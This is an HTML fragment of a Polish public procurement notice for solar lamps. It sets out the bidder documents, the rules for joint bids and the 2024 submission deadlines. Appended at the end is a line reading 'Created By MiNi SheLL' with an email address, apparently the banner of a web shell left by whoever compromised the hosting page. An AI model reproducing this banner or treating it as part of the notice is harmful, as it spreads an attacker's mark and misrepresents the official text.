2:<br/>-wykaz dostaw, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający wykonanie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanie co najmniej 1 dostawy kompletnych lamp solarnych w ilości min. 15 sztuk na rzecz jednego podmiotu [w ramach jednej umowy] wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - zgodnie ze wzorem Załącznika nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składając ofertę zobowiązany jest złożyć:<br/>1)	wypełniony Formularz Ofertowy zgodnie z Załącznikiem nr 1a do SWZ-dla Części nr 1 i zgodnie z Załącznikiem nr 1b do SWZ dla Części nr 2<br/>2)	aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu w zakresie wskazanym przez Zamawiającego – zgodnie z Załącznikiem nr 2 do SWZ;<br/>UWAGA: w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, niniejsze oświadczenie składa każdy z wykonawców. Oświadczenia te potwierdzają:<br/>- brak podstaw wykluczenia <br/>-spełnianie warunków udziału w postępowaniu w zakresie w jakim każdy z wykonawców wykazuje spełniania warunków udziału w postępowaniu;<br/>3)	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik. <br/>UWAGA: W przypadku wspólnego ubiegania się wykonawców o zamówienie, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. <br/>4)	w przypadku wykonawców wspólnie ubiegających się o zamówienie oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia [UWAGA: obowiązek złożenia oświadczenia odnosi się również do wykonawców, prowadzących działalność w formie spółki cywilnej], z którego wynika, które usługi lub dostawy wykonają poszczególni wykonawcy zgodnie z Załącznikiem nr 3 do SWZ;<br/>5)	w przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z oświadczeniem, o którym mowa w pkt. 1 także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby - w zakresie i zgodnie ze wzorem określonym w Załączniku nr 4 do SWZ.<br/>6)	W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia zgodnie ze wzorem określonym w Załączniku nr 5 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: <br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Do wykonawców wspólnie ubiegających się o udzielenie zamówienia zapisy SWZ stosuje się odpowiednio. <br/>2.	Warunek udziału w postepowaniu będzie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełniał będzie go samodzielnie. <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają dokumenty, o których mowa w pkt. 8.3.1. SWZ z tym, że:<br/>a)	oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postepowaniu w zakresie wskazanym przez Zamawiającego – zgodnie z Załącznikiem nr 2 do SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia i spełnianie warunków udziału w postepowaniu w zakresie w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postepowaniu;<br/>b)	w przypadku wspólnego ubiegania się wykonawców o zamówienie, zgodnie z art. 58 ust. 2 ustawy PZP Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku należy załączyć stosowne pełnomocnictwo.<br/>c)	w przypadku wykonawców wspólnie ubiegających się o zamówienie, należy dołączyć oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, (zgodnie z art. 117 ust. 4 ustawy PZP), z którego wynika, które, dostawy wykonają poszczególni wykonawcy zgodnie z Załącznikiem nr 3 do SWZ;<br/>4.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, mogą zostać wezwani do przedstawienia Zamawiającemu umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy zawarte są we „wzorze umowy” stanowiącym Załącznik nr 7a do SWZ dla Części nr 1 i Załącznik nr 7b do SWZ dla Części nr 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-02 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lipno/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-02 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com